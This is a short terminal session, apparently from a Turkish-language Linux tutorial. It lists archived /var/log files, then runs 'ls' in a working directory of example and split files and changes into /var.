var/log/pm-suspend.log.1
var/log/alternatives.log.1
var/log/syslog
var/log/aptitude.1.gz
var/log/speech-dispatcher/
var/log/gpu-manager.log
var/log/installer/
var/log/installer/initial-status.gz
var/log/installer/version
var/log/installer/debug
var/log/installer/partman
var/log/installer/casper.log
var/log/installer/syslog
var/log/installer/media-info
var/log/mysql.log.4.gz
var/log/pm-suspend.log
var/log/mysql.err
var/log/auth.log.2.gz
var/log/dbconfig-common/
var/log/dbconfig-common/dbc.log
var/log/auth.log.1
var/log/dmesg
var/log/vbox-install.log
var/log/wtmp.1
var/log/bootstrap.log
var/log/dmesg.3.gz
hakan paste # ls
dosya1  dosya3  log.tar.gz  var  xab  xad  xaf  xah
dosya2  dosya4  ornek       xaa  xac  xae  xag  yenidosya
hakan paste # cd /var/
hakan var # ls
backups  cache  lib  local  lock  log  mail  opt  run  spool  tmp  www
hakan var #